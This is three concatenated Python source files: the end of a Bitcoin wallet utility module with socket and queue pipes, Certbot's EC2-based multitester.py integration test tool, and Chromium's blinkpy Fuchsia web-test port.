query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
multitester.py | """
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_leauto_upgrades.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket, traceback
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
from botocore.exceptions import ClientError
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
# nargs='+',
# help='space-delimited list of arguments to pass to the bash test script',
# required=False)
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
parser.add_argument('--fast',
action='store_true',
help="use larger instance types to run faster (saves about a minute, probably not worth it)")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-072a9534772bec854' # premade shared boulder AMI 18.04LTS us-east-1
LOGDIR = "letest-%d"%int(time.time()) #points to logging / working directory
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status(object):
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
machine_type='t2.micro',
userdata=""): #userdata contains bash or cloud-init script
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
return ec2_client.create_instances(
BlockDeviceMappings=block_device_mappings,
ImageId=ami_id,
SecurityGroupIds=[security_group_id],
SubnetId=subnet_id,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type,
TagSpecifications=tag_spec)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib2.Request(urlstring)
response = urllib2.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib2.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
while state != 'running' or ip is None:
time.sleep(wait_time)
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
block_until_ssh_open(ip)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
"clones master of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
"clones branch <branch_name> of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt --branch %s --single-branch'%(repo_url, branch_name))
local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
"clones specified pull request from repo_url and optionally merges into master"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
local('cd letsencrypt && git checkout lePRtest')
if merge_master:
local('cd letsencrypt && git remote update origin')
local('cd letsencrypt && git merge origin/master -m "testmerge"')
local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
"copies local tarball of repo to remote"
with lcd(LOGDIR):
put(local_path='le.tar.gz', remote_path='')
run('tar xzf le.tar.gz')
def local_repo_clean():
"delete tarball"
with lcd(LOGDIR):
local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
"copies to remote and executes local script"
#with lcd('scripts'):
put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
run('./'+scriptfile+' '+args_str)
def run_boulder():
with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
run('sudo docker-compose up -d')
def config_and_launch_boulder(instance):
execute(deploy_script, 'scripts/boulder_config.sh')
execute(run_boulder)
def install_and_launch_certbot(instance, boulder_url, target):
execute(local_repo_to_remote)
with shell_env(BOULDER_URL=boulder_url,
PUBLIC_IP=instance.public_ip_address,
PRIVATE_IP=instance.private_ip_address,
PUBLIC_HOSTNAME=instance.public_dns_name,
PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
OS_TYPE=target['type']):
execute(deploy_script, cl_args.test_script)
def grab_certbot_log():
"grabs letsencrypt.log via cat into logged stdout"
sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
# fallback file if /var/log is unwriteable...? correct?
sudo('if [ -f ./certbot.log ]; then \
cat ./certbot.log; else echo "[nolocallog]"; fi')
def create_client_instance(ec2_client, target, security_group_id, subnet_id):
"""Create a single client instance for running tests."""
if 'machine_type' in target:
machine_type = target['machine_type']
elif target['virt'] == 'hvm':
machine_type = 't2.medium' if cl_args.fast else 't2.micro'
else:
# 32 bit systems
machine_type = 'c1.medium' if cl_args.fast else 't1.micro'
if 'userdata' in target.keys():
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
userdata=userdata)
def test_client_process(inqueue, outqueue, boulder_url):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
env.host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(env.host_string)
try:
install_and_launch_certbot(instance, boulder_url, target)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
execute(grab_certbot_log)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist):
print('Logs in ', LOGDIR)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) != len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
if cl_args.killboulder:
boulder_server.terminate()
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
print("Making local git repo")
try:
if cl_args.pull_request != '~':
print('Testing PR %s '%cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
execute(local_git_branch, cl_args.repo, cl_args.branch)
else:
print('Testing master of %s'%cl_args.repo)
execute(local_git_clone, cl_args.repo)
except FabricException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
boulder_preexists = False
boulder_servers = ec2_client.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance(ec2_client,
'le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_group_id=security_group_id,
subnet_id=subnet_id)
instances = []
try:
if not cl_args.boulderonly:
print("Creating instances: ", end="")
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id)
)
print()
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=(inqueue, outqueue, boulder_url))
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
failed = False
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist)
# kill any connections
fabric.network.disconnect_all()
if __name__ == '__main__':
main()
|
fuchsia.py | # Copyright (C) 2018 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import select
import socket
import subprocess
import sys
import threading
from blinkpy.common import exit_codes
from blinkpy.common.path_finder import WEB_TESTS_LAST_COMPONENT
from blinkpy.common.path_finder import get_chromium_src_dir
from blinkpy.web_tests.port import base
from blinkpy.web_tests.port import driver
from blinkpy.web_tests.port import factory
from blinkpy.web_tests.port import linux
from blinkpy.web_tests.port import server_process
# Modules loaded dynamically in _import_fuchsia_runner().
# pylint: disable=invalid-name
fuchsia_target = None
qemu_target = None
symbolizer = None
# pylint: enable=invalid-name
# Imports Fuchsia runner modules. This is done dynamically only when FuchsiaPort
# is instantiated to avoid dependency on Fuchsia runner on other platforms.
def _import_fuchsia_runner():
sys.path.insert(0, os.path.join(get_chromium_src_dir(), 'build/fuchsia'))
# pylint: disable=import-error
# pylint: disable=invalid-name
# pylint: disable=redefined-outer-name
global aemu_target
import aemu_target
global device_target
import device_target
global fuchsia_target
import target as fuchsia_target
global qemu_target
import qemu_target
global symbolizer
import symbolizer
# pylint: enable=import-error
# pylint: enable=invalid-name
# pylint: disable=redefined-outer-name
# Path to the content shell package relative to the build directory.
CONTENT_SHELL_PACKAGE_PATH = 'gen/content/shell/content_shell/content_shell.far'
# HTTP path prefixes for the HTTP server.
# WEB_TEST_PATH_PREFIX should be matched to the local directory name of
# web_tests because some tests and test_runner find test root directory
# with it.
WEB_TESTS_PATH_PREFIX = '/third_party/blink/' + WEB_TESTS_LAST_COMPONENT
# Paths to the directory where the fonts are copied to. Must match the path in
# content/shell/app/blink_test_platform_support_fuchsia.cc .
FONTS_DEVICE_PATH = '/system/fonts'
# Number of CPU cores in qemu.
CPU_CORES = 4
# Number of content_shell instances to run in parallel.
# Allow for two CPU cores per instance.
MAX_WORKERS = CPU_CORES / 2
PROCESS_START_TIMEOUT = 20
_log = logging.getLogger(__name__)
def _subprocess_log_thread(pipe, prefix):
try:
while True:
line = pipe.readline()
if not line:
return
_log.error('%s: %s', prefix, line)
finally:
pipe.close()
class SubprocessOutputLogger(object):
def __init__(self, process, prefix):
self._process = process
self._thread = threading.Thread(
target=_subprocess_log_thread, args=(process.stdout, prefix))
self._thread.daemon = True
self._thread.start()
def __del__(self):
self.close()
def close(self):
self._process.kill()
class _TargetHost(object):
def __init__(self, build_path, build_ids_path, ports_to_forward, target,
results_directory):
try:
self._amber_repo = None
self._target = target
self._target.Start()
self._setup_target(build_path, build_ids_path, ports_to_forward,
results_directory)
except:
self.cleanup()
raise
def _setup_target(self, build_path, build_ids_path, ports_to_forward,
results_directory):
# Tell SSH to forward all server ports from the Fuchsia device to
# the host.
forwarding_flags = [
'-O',
'forward', # Send SSH mux control signal.
'-N', # Don't execute command
'-T' # Don't allocate terminal.
]
for port in ports_to_forward:
forwarding_flags += ['-R', '%d:localhost:%d' % (port, port)]
self._proxy = self._target.RunCommandPiped([],
ssh_args=forwarding_flags,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._listener = self._target.RunCommandPiped(['log_listener'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
listener_log_path = os.path.join(results_directory, 'system_log')
listener_log = open(listener_log_path, 'w')
self.symbolizer = symbolizer.RunSymbolizer(
self._listener.stdout, listener_log, [build_ids_path])
self._amber_repo = self._target.GetAmberRepo()
self._amber_repo.__enter__()
package_path = os.path.join(build_path, CONTENT_SHELL_PACKAGE_PATH)
self._target.InstallPackage([package_path])
# Process will be forked for each worker, which may make QemuTarget
# unusable (e.g. waitpid() for qemu process returns ECHILD after
# fork() ). Save command runner before fork()ing, to use it later to
# connect to the target.
self.target_command_runner = self._target.GetCommandRunner()
def run_command(self, command):
return self.target_command_runner.RunCommandPiped(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def cleanup(self):
if self._amber_repo:
self._amber_repo.__exit__(None, None, None)
if self._target:
# Emulator targets will be shutdown during cleanup.
# TODO(sergeyu): Currently __init__() always starts Qemu, so we can
# just shutdown it. Update this logic when reusing target devices
# for multiple test runs.
if not isinstance(self._target, device_target.DeviceTarget):
self._target.Shutdown()
self._target = None
class FuchsiaPort(base.Port):
port_name = 'fuchsia'
SUPPORTED_VERSIONS = ('fuchsia', )
FALLBACK_PATHS = {
'fuchsia':
['fuchsia'] + linux.LinuxPort.latest_platform_fallback_path()
}
def __init__(self, host, port_name, **kwargs):
super(FuchsiaPort, self).__init__(host, port_name, **kwargs)
self._operating_system = 'fuchsia'
self._version = 'fuchsia'
self._target_device = self.get_option('device')
# TODO(sergeyu): Add support for arm64.
self._architecture = 'x86_64'
self.server_process_constructor = FuchsiaServerProcess
# Used to implement methods that depend on the host platform.
self._host_port = factory.PortFactory(host).get(**kwargs)
self._target_host = self.get_option('fuchsia_target')
self._zircon_logger = None
self._host_ip = self.get_option('fuchsia_host_ip')
_import_fuchsia_runner()
def _driver_class(self):
return ChromiumFuchsiaDriver
def _path_to_driver(self, target=None):
return self._build_path_with_target(target, CONTENT_SHELL_PACKAGE_PATH)
def __del__(self):
if self._zircon_logger:
self._zircon_logger.close()
def setup_test_run(self):
super(FuchsiaPort, self).setup_test_run()
try:
target_args = {
'out_dir': self._build_path(),
'system_log_file': None,
'fuchsia_out_dir': self.get_option('fuchsia_out_dir')
}
if self._target_device == 'device':
additional_args = {
'target_cpu': self.get_option('fuchsia_target_cpu'),
'ssh_config': self.get_option('fuchsia_ssh_config'),
'os_check': 'ignore',
'host': self.get_option('fuchsia_host'),
'port': self.get_option('fuchsia_port'),
'node_name': self.get_option('fuchsia_node_name')
}
target_args.update(additional_args)
target = device_target.DeviceTarget(**target_args)
else:
additional_args = {
'target_cpu': 'x64',
'cpu_cores': CPU_CORES,
'require_kvm': True,
'ram_size_mb': 8192
}
if self._target_device == 'qemu':
target_args.update(additional_args)
target = qemu_target.QemuTarget(**target_args)
else:
additional_args.update({
'enable_graphics': False,
'hardware_gpu': False
})
target_args.update(additional_args)
target = aemu_target.AemuTarget(**target_args)
self._target_host = _TargetHost(self._build_path(),
self.get_build_ids_path(),
self.SERVER_PORTS, target,
self.results_directory())
if self.get_option('zircon_logging'):
self._zircon_logger = SubprocessOutputLogger(
self._target_host.run_command(['dlog', '-f']), 'Zircon')
# Save fuchsia_target in _options, so it can be shared with other
# workers.
self._options.fuchsia_target = self._target_host
except fuchsia_target.FuchsiaTargetException as e:
_log.error('Failed to start qemu: %s.', str(e))
return exit_codes.NO_DEVICES_EXIT_STATUS
def clean_up_test_run(self):
if self._target_host:
self._target_host.cleanup()
self._target_host = None
def num_workers(self, requested_num_workers):
# Run a single qemu instance.
return min(MAX_WORKERS, requested_num_workers)
def _default_timeout_ms(self):
# Use 20s timeout instead of the default 6s. This is necessary because
# the tests are executed in qemu, so they run slower compared to other
# platforms.
return 20000
def requires_http_server(self):
"""HTTP server is always required to avoid copying the tests to the VM.
"""
return True
def start_http_server(self, additional_dirs, number_of_drivers):
additional_dirs['/third_party/blink/PerformanceTests'] = \
self._perf_tests_dir()
additional_dirs[WEB_TESTS_PATH_PREFIX] = self.web_tests_dir()
additional_dirs['/gen'] = self.generated_sources_directory()
additional_dirs['/third_party/blink'] = \
self._path_from_chromium_base('third_party', 'blink')
super(FuchsiaPort, self).start_http_server(additional_dirs,
number_of_drivers)
def path_to_apache(self):
return self._host_port.path_to_apache()
def path_to_apache_config_file(self):
return self._host_port.path_to_apache_config_file()
